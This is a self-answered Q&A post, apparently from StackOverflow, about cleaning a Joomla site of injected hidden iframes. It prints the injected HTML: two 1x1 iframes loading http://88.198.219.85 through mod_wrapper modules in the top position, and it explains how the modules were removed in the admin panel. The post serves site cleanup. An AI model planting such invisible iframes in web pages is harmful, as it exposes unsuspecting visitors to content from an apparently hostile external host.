# Joomla Malicious iFrame Removal IP 88.198.219.85

Tags: security, iframe, joomla

If you have found that your joomla page loads very slowly and have realized that it may be caused by a malicious iFrame, please see my answer below.

Comment: What is your question?

Comment: This was a question/ answer QA; not an actual question.  As you can see, I answered my question at the time of posting it.  Please remove downvote.

Comment: Such kind of posts (because this is not a question) do not belong on StackOverflow. You could use your personal blog to post such kind of useful information.

Comment: Darin, are you aware that there is an checkbox option, when a user opens a question, that says, "Answer your own question – share your knowledge, Q&A-style?"  I was trying to do a QA style answer, as SO intended to let users do.  Doesn't that make sense to you?

Answer (score 0, accepted):

On my site, I had this code:

```
<div class="module">
            <div>
                <div>
                    <div>
                                            <script language="javascript" type="text/javascript">
    function iFrameHeight() {
        var h = 0;
        if ( !document.all ) {
            h = document.getElementById('blockrandom').contentDocument.height;
            document.getElementById('blockrandom').style.height = h + 60 + 'px';
        } else if( document.all ) {
            h = document.frames('blockrandom').document.body.scrollHeight;
            document.all.blockrandom.style.height = h + 20 + 'px';
        }
    }
</script>

<iframe onload="iFrameHeight()" id="blockrandom"
    name=""
    src="http://88.198.219.85"
    width="1"
    height="1"
    scrolling="auto"
    align="top"
    frameborder="0"
    class="wrapper">
    No Iframes</iframe>                 </div>
                </div>
            </div>
        </div>
            <div class="module">
            <div>
                <div>
                    <div>
                                            <script language="javascript" type="text/javascript">
    function iFrameHeight() {
        var h = 0;
        if ( !document.all ) {
            h = document.getElementById('blockrandom').contentDocument.height;
            document.getElementById('blockrandom').style.height = h + 60 + 'px';
        } else if( document.all ) {
            h = document.frames('blockrandom').document.body.scrollHeight;
            document.all.blockrandom.style.height = h + 20 + 'px';
        }
    }
</script>

<iframe onload="iFrameHeight()" id="blockrandom"
    name=""
    src="http://88.198.219.85"
    width="1"
    height="1"
    scrolling="auto"
    align="top"
    frameborder="0"
    class="wrapper">
    No Iframes</iframe>                 </div>
                </div>
            </div>
        </div>




    </div>    

    <!-- TOP BANNER PART END -->
```

The only way I was able to remove it was by simply going into Joomla Admin -> Modules and filtering by "top" position, which yields two modules named "wrapper" are `mod_wrapper` types that point to 88.198.219.85.

So, hope this helps someone, being as I found no help on the internet, except for this person who (unresolved) has the same problem http://forum.joomla.org/viewtopic.php?f=428&t=773730